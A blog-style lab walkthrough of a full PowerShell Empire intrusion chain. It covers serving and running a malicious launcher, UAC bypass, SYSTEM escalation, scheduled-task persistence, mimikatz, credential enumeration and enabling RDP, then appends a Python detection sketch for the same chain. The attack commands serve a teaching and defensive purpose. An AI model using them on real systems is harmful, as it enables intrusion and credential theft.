Friday, February 14, 2020

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
uselistener http
execute

2.) create a stager
usestager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) set up a web server to serve the malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have the victim PC reach out to the attacker PC, download launcher.ps1, and execute it

5.) interact with agent
** you should see the agent check in as soon as step #4 above is complete **
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness to escalate to admin (perhaps you are already admin and just need a UAC bypass)
usemodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getsystem
execute

12.) see where you are
whoami    (should say SYSTEM now)

13.) set up persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usemodule management/enable_rdp
execute

17.) remote desktop into the victim with the credentials found
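As an added defender-side example that is not part of the original post, the Python sketch below scores a host's Windows/Sysmon events against the observable artifacts of the chain above: the encoded hidden launcher (step 4), the stager fetch from the step 3 web server, scheduled-task persistence (step 13), LSASS access from mimikatz (step 14), and the fDenyTSConnections registry value that RDP enablement typically flips (step 16). The event field names, the event IDs chosen, the port list and all sample events are assumptions constructed for illustration, not real telemetry.

```python
import re

# Constructed sample events (not real telemetry) mirroring the chain's artifacts:
# encoded hidden launcher, stager fetch from the web server, scheduled-task
# persistence, LSASS access, and the fDenyTSConnections flip from enable_rdp.
SAMPLE_EVENTS = [
    {"provider": "Sysmon", "id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -noP -sta -w 1 -enc <constructed-base64>"},
    {"provider": "Sysmon", "id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "10.0.0.5", "dst_port": 8000},
    {"provider": "Security", "id": 4698, "task_name": r"\Updater",
     "cmdline": "powershell -NonI -W hidden -enc <constructed-base64>"},
    {"provider": "Sysmon", "id": 10, "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\System32\lsass.exe"},
    {"provider": "Sysmon", "id": 13, "details": "DWORD (0x00000000)",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    {"provider": "Sysmon", "id": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)   # -enc / -EncodedCommand
HIDDEN_PS = re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.I)        # -w 1 / -WindowStyle hidden

def _ps(ev, field="image"):
    return "powershell" in ev.get(field, "").lower()

# One rule per observable stage: (stage name, predicate over a single event).
RULES = [
    ("launcher_exec", lambda e: e.get("provider") == "Sysmon" and e.get("id") == 1 and _ps(e)
        and bool(ENCODED_PS.search(e.get("cmdline", ""))) and bool(HIDDEN_PS.search(e.get("cmdline", "")))),
    ("stager_download", lambda e: e.get("id") == 3 and _ps(e) and e.get("dst_port") in (80, 8000, 8080)),
    ("schtasks_persist", lambda e: e.get("provider") == "Security" and e.get("id") == 4698 and _ps(e, "cmdline")),
    ("lsass_access", lambda e: e.get("id") == 10 and e.get("target_image", "").lower().endswith("lsass.exe")),
    ("rdp_enabled", lambda e: e.get("id") == 13 and "0x00000000" in e.get("details", "")
        and e.get("target_object", "").lower().endswith("fdenytsconnections")),
]

def match_stages(events):
    """Return {stage: [event indices]} for every rule that fires on this host's events."""
    hits = {}
    for i, ev in enumerate(events):
        for stage, pred in RULES:
            if pred(ev):
                hits.setdefault(stage, []).append(i)
    return hits

def chain_alert(events, min_stages=3):
    """Raise one high-confidence alert only when several distinct stages appear together."""
    return len(match_stages(events)) >= min_stages
```

Requiring several stages on one host keeps a lone encoded PowerShell command from paging anyone while still catching the full chain.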